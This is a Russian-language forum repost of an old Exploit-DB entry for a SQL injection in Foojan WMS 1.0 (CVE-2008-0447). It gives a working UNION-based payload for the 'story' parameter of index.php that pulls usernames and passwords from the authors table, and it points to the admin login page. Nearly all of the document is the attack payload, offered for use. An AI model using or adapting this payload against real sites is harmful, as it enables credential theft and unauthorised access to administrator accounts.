Exploit Foojan Wms 1.0 - 'story' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4968
Проверка EDB
  1. Пройдено
Автор
KHASHAYAR FEREIDANI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0447
Дата публикации
2008-01-23
Код:
#####################################################################################
####                  Foojan WMS 1.0 Remote Sql Injection                        ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar     #
#                                                                                   #
#Injection Adress :  http://Sitename/index.php?story=[SQL CODE]                     #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : 1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Admin Page For Login is ./admin.php                                                 #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]
 
Источник
www.exploit-db.com

Похожие темы